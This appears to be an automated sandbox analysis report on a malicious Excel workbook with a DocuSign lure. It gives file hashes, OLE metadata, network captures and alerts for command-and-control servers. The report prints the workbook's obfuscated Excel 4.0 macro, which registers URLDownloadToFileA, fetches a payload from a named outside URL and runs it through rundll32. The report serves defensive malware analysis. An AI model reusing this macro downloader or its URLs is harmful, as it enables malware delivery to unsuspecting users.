SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660500020953335 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXa:YEGSzx0dmxk7RbsYsKtseoXq |
MD5: | 2C9F8E47B1600F5DE2F6DCDFB24094CC |
SHA1: | D4BE003987DD33946B0636CFA3CA7F22095B65B5 |
SHA-256: | A8EAB1FB3FE63C24CD13039896ADA32D0463BB1D31ECEDC59C02E661EB4054CF |
SHA-512: | 4256D5E72B27028E98B2E896211A25D2DD3102E4625DEA37AFB2FF7E4117025952B26AA399E9673B9EF0C782376001E9E894A0B4A4B88775945F5D35F65B201D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.495155303444507 |
Encrypted: | false |
SSDEEP: | 12:85Q+pgLgXg/XAlCPCHaXSzB8aB/OxJX+WnicvbLbDtZ3YilMMEpxRljKrcCTdJP8:85jk/XTK6aEJYe7Dv3qSnrNru/ |
MD5: | 6AD8E80E987BF8C934BD3809D8B2B24A |
SHA1: | 6E7E22616035724B1F851AFD0DB24BF745C1A49D |
SHA-256: | A48DD1DA24A3FFD1E5FF10E8314D8FB031D4741E37E22FD8297E4F440144FE54 |
SHA-512: | F8BD2A5C8116945136D106753122AABC98EF29877E246A2CDC4FECDE777DEDEC2AF167DB6FF6BB86C53ACD56359B29AAFDF95851D1DCC39C612C2F94AA31F976 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.581927649821565 |
Encrypted: | false |
SSDEEP: | 48:8BN/XTZaiHCqQFHCCWQh2BN/XTZaiHCqQFHCCWQ/:8BN/X1aiiyCWQh2BN/X1aiiyCWQ/ |
MD5: | 6463D8D40C4CE9238290D3D9B27C30F2 |
SHA1: | 5DB759C84513B007B87571B18FAEC5140DA23B9C |
SHA-256: | 16E680D0309BC36471D6668FC9142E40093A5879F6EDD687A1F3AB88B07D4412 |
SHA-512: | 8B5622C40D905FE466777FCD5A61C9F3BBD8C563A969DE585EFC0B41BD00260C7FD8A340E47AB7A754CFFF8010129379DCB1D15611F29C444E179E9812329D7D |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.864166697857585 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW3k2uscbcsoMW3k2mM0bcsoMW3k2v:dj60wsoMW0nwsoMW0o0wsoMW0I |
MD5: | C69269D3656A2431308C88DEF4D4F13F |
SHA1: | F674A7D59F59141335B18F2B639B47DBCE39B7A9 |
SHA-256: | EE99BFC929243FB6DE7456053F6298AF672490869E31DB431EBC927E07483DD2 |
SHA-512: | 15C6248901F8FDF3DFD060938B7E70AD372878E99DB616F33129A788004190E3F6AA10D7CF5810F57798A09980A61017191F1606D304B719826EE4A6741AAA63 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.2399467144037395 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnM:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKI |
MD5: | E48CD2A56FE62C58737B52EADBA85D78 |
SHA1: | B43686D2ADBFBE3F46F740B3EE2E5B9C64634041 |
SHA-256: | 3152805E9D9C73AD3F4697857DD09D126EFDC3BF9B81C57C2BC385F741495172 |
SHA-512: | 449E2593CDAD3C634F41E0FD35465EF74FD7B2FB2BC5885CDEC7CDA6929E2DEE0FCF43610DB04515B4EC8416D8142CCEA693ED5731971991CEE2CF62D01FF77B |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls |
File size: | 168960 |
MD5: | 31964397103260697c37ee4237194da9 |
SHA1: | 7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94 |
SHA256: | 12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4 |
SHA512: | 0440996111d6eada8a6f1389d0658adcc291b2d1000b5f47c83cc3c03673f4e4cc89ff9d21a3b7ad02b13e208241ff0432286201f254d15b1167fdbbf074c352 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMD:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKe |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-03:17:14.088896 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49166 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-03:17:16.980781 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49168 | 443 | 192.168.2.22 | 108.170.20.75 |
02/20/21-03:18:00.666014 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49170 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-03:19:11.713314 | TCP | 2404316 | ET CNC Feodo Tracker Reported CnC Server TCP group 9 | 49171 | 443 | 192.168.2.22 | 186.137.85.76 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 03:17:03.575388908 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.632915020 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.633085966 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.634332895 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.691679001 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.699875116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.699927092 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.699975967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700018883 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700040102 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700057983 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700098991 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700103045 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700134039 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700139046 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700176954 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700186014 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700217009 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700242996 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700257063 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.700289011 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.700339079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.709024906 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759267092 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759326935 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759366989 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759407997 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759428978 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759448051 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759471893 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759478092 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759483099 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759495974 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759507895 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759541988 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759562969 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759581089 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759603024 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759619951 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759644985 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759659052 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759701967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759717941 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759726048 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759741068 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759761095 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759780884 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759829044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759845972 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759857893 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759874105 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759886980 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759912014 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759951115 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.759967089 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759978056 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.759989977 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.760011911 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.760027885 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.760049105 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.760067940 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.760093927 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.760128975 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.760921955 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.818933964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819010019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819053888 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819072962 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819093943 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819135904 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819129944 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819149017 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819176912 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819197893 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819216013 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819231987 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819240093 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819257021 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819297075 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819303036 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819346905 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819348097 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819360018 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819391012 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819403887 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819428921 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819447994 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819468975 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819485903 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819509983 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819523096 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819547892 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819565058 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819586992 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819606066 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819626093 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819644928 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819679022 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:17:03.819684029 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:17:03.819722891 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 03:17:03.494488001 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:03.552203894 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:17:15.065036058 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:15.127029896 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:17:15.140758991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:15.201056957 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 03:17:03.494488001 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 03:17:03.634332895 CET | 0 | OUT | |
Feb 20, 2021 03:17:03.699875116 CET | 2 | IN |